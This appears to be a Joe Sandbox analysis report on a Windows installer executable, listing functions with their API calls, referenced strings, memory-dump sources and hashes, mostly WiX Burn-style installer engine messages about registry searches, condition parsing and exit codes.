                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00807279
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008072B2
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008072EB
                                                                                                                                                                • Part of subcall function 00806D50: SysFreeString.OLEAUT32(00000000), ref: 00806E89
                                                                                                                                                                • Part of subcall function 00806D50: SysFreeString.OLEAUT32(00000000), ref: 00806EC8
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080736F
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0080741F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Compare$Free
                                                                                                                                                              • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                              • API String ID: 318886736-2569518843
                                                                                                                                                              • Opcode ID: 972fe7e44fb66b8852f4dc56cc35502d1cfaddd3d0c6936caffd8574db2d12b8
                                                                                                                                                              • Instruction ID: 6547564cd418cd978cc57fe3a13f80862143a16e943f5dee3d0bbf7d51e762bd
                                                                                                                                                              • Opcode Fuzzy Hash: 972fe7e44fb66b8852f4dc56cc35502d1cfaddd3d0c6936caffd8574db2d12b8
                                                                                                                                                              • Instruction Fuzzy Hash: 00A18D31D0862AFBDB619A94CC41FAEBA64FB04730F214365F921E62D1DB70FA50DB91
                                                                                                                                                              Function 007CA416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA45A
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA480
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 007CA768
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to clear variable., xrefs: 007CA4D8
                                                                                                                                                              • Unsupported registry key value type. Type = '%u', xrefs: 007CA608
                                                                                                                                                              • Failed to allocate string buffer., xrefs: 007CA667
                                                                                                                                                              • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA740
                                                                                                                                                              • Failed to query registry key value., xrefs: 007CA5DA
                                                                                                                                                              • Failed to change value type., xrefs: 007CA70F
                                                                                                                                                              • Failed to allocate memory registry value., xrefs: 007CA587
                                                                                                                                                              • Failed to get expand environment string., xrefs: 007CA6DD
                                                                                                                                                              • Failed to format key string., xrefs: 007CA465
                                                                                                                                                              • search.cpp, xrefs: 007CA54A, 007CA57D, 007CA5D0, 007CA6D3
                                                                                                                                                              • Failed to open registry key., xrefs: 007CA4ED
                                                                                                                                                              • Failed to query registry key value size., xrefs: 007CA554
                                                                                                                                                              • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 007CA51C
                                                                                                                                                              • Failed to read registry value., xrefs: 007CA6F6
                                                                                                                                                              • Failed to set variable., xrefs: 007CA72B
                                                                                                                                                              • Registry key not found. Key = '%ls', xrefs: 007CA4B4
                                                                                                                                                              • Failed to format value string., xrefs: 007CA48B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16$Close
                                                                                                                                                              • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                              • API String ID: 2348241696-3124384294
                                                                                                                                                              • Opcode ID: 9430093391d4c2cbb2c5c96ee76da7993da734d493133993ac4aa0c4c28fed27
                                                                                                                                                              • Instruction ID: 4d983ca8998cdda2ba0f9d5f440518f776df6ce087a68a8a6c1182faa2fdbb64
                                                                                                                                                              • Opcode Fuzzy Hash: 9430093391d4c2cbb2c5c96ee76da7993da734d493133993ac4aa0c4c28fed27
                                                                                                                                                              • Instruction Fuzzy Hash: 99A10572D0052DFBCB229AA4CC49FAEBB78FB08715F15811DF910F6290D73999109BD2
                                                                                                                                                              Function 007C5770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C5795
                                                                                                                                                              • lstrlenW.KERNEL32(000002C0,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C579F
                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 007C59A7
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,007CA8B4,00000100,000002C0,000002C0,00000100), ref: 007C5C4A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                                              • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                              • API String ID: 1026845265-2050445661
                                                                                                                                                              • Opcode ID: b8f76767b03fc40ccd08d24fccb9557d735025cc485538caff87f5236945d03f
                                                                                                                                                              • Instruction ID: 770ccb94d5553f3ac3cdc345ed7182f19138350dbe4c6b89376b9889890114f5
                                                                                                                                                              • Opcode Fuzzy Hash: b8f76767b03fc40ccd08d24fccb9557d735025cc485538caff87f5236945d03f
                                                                                                                                                              • Instruction Fuzzy Hash: 8CF19571901619EADB209FA58C45FAF7BA4FB04B20F15812DFD14EB241D73DAE818BA1
                                                                                                                                                              Function 007ECE81 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 240synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,007ED558,?,?,?), ref: 007ECEC7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007ED558,?,?,?), ref: 007ECED4
                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 007ED13C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                                              • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                              • API String ID: 3944734951-2991465304
                                                                                                                                                              • Opcode ID: fe721f0d93789ac844b2e2299787bde118b788d4c648b0409556963377a99d17
                                                                                                                                                              • Instruction ID: 6af5b48215ff5fd594298e8d6b8b6fe1c04099b13413b3ad14887e3a8126a31d
                                                                                                                                                              • Opcode Fuzzy Hash: fe721f0d93789ac844b2e2299787bde118b788d4c648b0409556963377a99d17
                                                                                                                                                              • Instruction Fuzzy Hash: 8C81F576A42766FBC7329B668C09F5A7AA4FF08720F114129FD14AB341E738DD408AE4
                                                                                                                                                              Function 007CEA42 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 008032F3: VariantInit.OLEAUT32(?), ref: 00803309
                                                                                                                                                                • Part of subcall function 008032F3: SysAllocString.OLEAUT32(?), ref: 00803325
                                                                                                                                                                • Part of subcall function 008032F3: VariantClear.OLEAUT32(?), ref: 008033AC
                                                                                                                                                                • Part of subcall function 008032F3: SysFreeString.OLEAUT32(00000000), ref: 008033B7
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0080CA9C,?,?,Action,?,?,?,00000000,?), ref: 007CEB13
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 007CEB5D
                                                                                                                                                              Strings
                                                                                                                                                              • RelatedBundle, xrefs: 007CEA50
                                                                                                                                                              • Addon, xrefs: 007CEB9A
                                                                                                                                                              • Failed to resize Detect code array in registration, xrefs: 007CEC2E
                                                                                                                                                              • Failed to resize Upgrade code array in registration, xrefs: 007CEC35
                                                                                                                                                              • cabinet.dll, xrefs: 007CEBBA
                                                                                                                                                              • version.dll, xrefs: 007CEB70
                                                                                                                                                              • Upgrade, xrefs: 007CEB50
                                                                                                                                                              • Detect, xrefs: 007CEB04
                                                                                                                                                              • comres.dll, xrefs: 007CEB26
                                                                                                                                                              • Failed to resize Addon code array in registration, xrefs: 007CEC3C
                                                                                                                                                              • Invalid value for @Action: %ls, xrefs: 007CEC52
                                                                                                                                                              • Action, xrefs: 007CEAD0
                                                                                                                                                              • Failed to resize Patch code array in registration, xrefs: 007CEC43
                                                                                                                                                              • Patch, xrefs: 007CEBDD
                                                                                                                                                              • Failed to get next RelatedBundle element., xrefs: 007CEC70
                                                                                                                                                              • Failed to get @Id., xrefs: 007CEC62
                                                                                                                                                              • Failed to get @Action., xrefs: 007CEC69
                                                                                                                                                              • Failed to get RelatedBundle nodes, xrefs: 007CEA72
                                                                                                                                                              • Failed to get RelatedBundle element count., xrefs: 007CEA97
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                                              • API String ID: 702752599-259800149
                                                                                                                                                              • Opcode ID: f3e25260cdba35c8b9f94925c8c6d54503455998f42ff253b6772bd6082a4f10
                                                                                                                                                              • Instruction ID: e3a35bcd6f93c25c8817d21c738750be3835c968fc5e2a94f1c704c773cea631
                                                                                                                                                              • Opcode Fuzzy Hash: f3e25260cdba35c8b9f94925c8c6d54503455998f42ff253b6772bd6082a4f10
                                                                                                                                                              • Instruction Fuzzy Hash: 79716D71A05616BBCB20DA94CD45FAEB7B8FF04724F20425CE921A62C1D778AE51CBA0
                                                                                                                                                              Function 007D46DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D46F3
                                                                                                                                                              • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D4714
                                                                                                                                                              • GetLastError.KERNEL32(?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D471A
                                                                                                                                                              • ReadFile.KERNEL32(feclient.dll,00000000,0080B518,?,00000000,00000000,0080B519,?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D47A8
                                                                                                                                                              • GetLastError.KERNEL32(?,007D4BF5,0080B4E8,?,feclient.dll,00000000,?,?), ref: 007D47AE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                                              • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                                                              • API String ID: 1233551569-452622383
                                                                                                                                                              • Opcode ID: 103e36bcddebb65b2a635d9c595810ad1c98817118327503a81fb854a8f9c64f
                                                                                                                                                              • Instruction ID: 20d818f13b1d2c822e4f7c9954c9a777a5c675526cadc947e397b6353fc733d6
                                                                                                                                                              • Opcode Fuzzy Hash: 103e36bcddebb65b2a635d9c595810ad1c98817118327503a81fb854a8f9c64f
                                                                                                                                                              • Instruction Fuzzy Hash: 70519376D80266B7DB219A948C46FAE7678FF01B60F11416ABE20FB380D7789D4096E1
                                                                                                                                                              Function 007E27FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                                              • API String ID: 760788290-1911311241
                                                                                                                                                              • Opcode ID: 13eb5f69bf8e54e4286c39ed2fcef4e72ef62111350de11c0d56c67f8961977b
                                                                                                                                                              • Instruction ID: f57ad5b4a9aee3059e5b5ffcf4de6c679a663ebe9227bdaa172ad211f50471e5
                                                                                                                                                              • Opcode Fuzzy Hash: 13eb5f69bf8e54e4286c39ed2fcef4e72ef62111350de11c0d56c67f8961977b
                                                                                                                                                              • Instruction Fuzzy Hash: 0741FDB1E867A2B6C62555658C02FAAB25CFF1C730F201321B934F73C3DB6CAD429291
                                                                                                                                                              Function 007C8F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,560080DB,00000001,?,007C9946,?,00000000,00000000,?,?,007C992E,?,?,00000000,?), ref: 007C8FB2
                                                                                                                                                              Strings
                                                                                                                                                              • AND, xrefs: 007C92BC
                                                                                                                                                              • condition.cpp, xrefs: 007C9084, 007C914E, 007C91CA, 007C922E, 007C936C, 007C93B0, 007C93F4
                                                                                                                                                              • Failed to set symbol value., xrefs: 007C9060
                                                                                                                                                              • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 007C93C4
                                                                                                                                                              • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 007C9162
                                                                                                                                                              • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 007C91DE
                                                                                                                                                              • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 007C9098
                                                                                                                                                              • NOT, xrefs: 007C92DB
                                                                                                                                                              • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 007C9380
                                                                                                                                                              • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 007C9242
                                                                                                                                                              • -, xrefs: 007C9118
                                                                                                                                                              • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 007C9408
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringType
                                                                                                                                                              • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                              • API String ID: 4177115715-3594736606
                                                                                                                                                              • Opcode ID: 8ffec515ecba6ffdb361dd5fd1946efb58b36095197c2b8f3f601b394e777d75
                                                                                                                                                              • Instruction ID: be62ec626ef7804d5c1730cf8862e5a5cf8b1d6da3ff9a705952f8c3fa38ff0b
                                                                                                                                                              • Opcode Fuzzy Hash: 8ffec515ecba6ffdb361dd5fd1946efb58b36095197c2b8f3f601b394e777d75
                                                                                                                                                              • Instruction Fuzzy Hash: 3FF1D271600346FBDBA88F94C88DFAA7BA4FB04700F10854DFA159A685D3BDDB91CB90
                                                                                                                                                              Function 007D6BCA Relevance: 35.4, APIs: 6, Strings: 14, Instructions: 351synchronizationthreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007CD4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4B7
                                                                                                                                                                • Part of subcall function 007CD4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 007CD4C6
                                                                                                                                                                • Part of subcall function 007CD4A8: LeaveCriticalSection.KERNEL32(000000D0,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4DB
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,007D57BD,?,00000000,00000000), ref: 007D6E34
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,007C4522,?,0080B500,?,007C4846,?,?), ref: 007D6E43
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007C4522,?,0080B500,?,007C4846,?,?), ref: 007D6EA0
                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 007D6F92
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007D6F9B
                                                                                                                                                              • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 007D6FB5
                                                                                                                                                                • Part of subcall function 007EBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 007EBD0A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                              • String ID: "E|$Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$FH|$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                                                              • API String ID: 2169948125-3642455306
                                                                                                                                                              • Opcode ID: a1efd5763e7b78e96988f21f3c99a3401346bb289d036ec5eae75900a9a62177
                                                                                                                                                              • Instruction ID: 8435d073067ef2c58f3725ca6d248f1c14ce973176daef6f1bcd4cdd87f4b64b
                                                                                                                                                              • Opcode Fuzzy Hash: a1efd5763e7b78e96988f21f3c99a3401346bb289d036ec5eae75900a9a62177
                                                                                                                                                              • Instruction Fuzzy Hash: 81C1BE72901615EADF119F64D889BEA3BB9FF04714F04417BFD09AE342DB789980CBA1
                                                                                                                                                              Function 007E1BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 007E1CB8
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 007E1CD6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                              • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                                                              • API String ID: 2664528157-1714101571
                                                                                                                                                              • Opcode ID: 3b9e1b8454fbe4ba558986b28b3a4db8a1c69497580244d685903820b53b7f4b
                                                                                                                                                              • Instruction ID: 00b9363c3cb58eacdc8b8b87b1a8ba4b833ac3db1793776c5339f34381b8af46
                                                                                                                                                              • Opcode Fuzzy Hash: 3b9e1b8454fbe4ba558986b28b3a4db8a1c69497580244d685903820b53b7f4b
